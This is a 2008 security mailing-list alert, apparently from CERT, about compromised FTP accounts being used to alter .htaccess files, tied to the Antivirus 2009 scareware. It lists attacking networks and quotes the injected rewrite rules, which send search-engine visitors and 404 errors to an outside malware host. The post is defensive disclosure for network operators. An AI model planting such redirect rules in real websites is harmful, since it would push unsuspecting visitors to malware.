[nsp-sec] Antivirus 2009, Compromised FTP account and modified .htaccess files - paging Earthlink and STARNETMD
Nicholas Ianelli
ni at cert.org
Wed Oct 8 16:09:07 EDT 2008
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
So check this out, I just received word on what appears to be a mass
automated exploitation of compromised FTP accounts in an attempt to
modify any existing .htaccess files.
The attacks are sourced from the following networks:
209.178.141.39
87.248.180.0/24
4355 | 209.178.141.39 | ERMS-EARTHLNK - EARTHLINK, INC.
31252 | 87.248.180.0 | STARNET-AS SC StarNet SRL
peer-whois.cymru.com [2008-10-08 20:08:20 +0000]
174 | 209.178.141.39 | COGENT Cogent/PSI
2516 | 209.178.141.39 | KDDI KDDI CORPORATION
2914 | 87.248.180.0 | NTT-COMMUNICATIONS-2914 - NTT America, Inc.
3356 | 209.178.141.39 | LEVEL3 Level 3 Communications
4565 | 209.178.141.39 | MEGAPATH2-US - MegaPath Networks Inc.
7132 | 209.178.141.39 | SBIS-AS - AT&T Internet Services
8708 | 87.248.180.0 | RDSNET RCS & RDS S.A.
10310 | 209.178.141.39 | YAHOO-1 - Yahoo!
11164 | 209.178.141.39 | TRANSITRAIL - National LambdaRail, LLC
Modified .htaccess files look like this:
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://89.28.13.200/in.html?s=sb [R,L]
Errordocument 404 http://89.28.13.200/in.html?s=sb_err
This appears to be in relation to Antivirus 2009 which is a really nasty
piece of malware that modifies System Restore points, Desktop properties
and install additional pieces of malicious code.
You may wish to check for flows from the above IPs and see if you have
any modified .htaccess files.
Cheers,
Nick
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (MingW32)
iEYEARECAAYFAkjtE2MACgkQi10dJIBjZICmDACaAgyKogMeKvMsXMFqnTDJD7q7
y1YAn0uyaciyGCjHnAnlYBk9vv79Tsl0
=dyCa
-----END PGP SIGNATURE-----
More information about the nsp-security
mailing list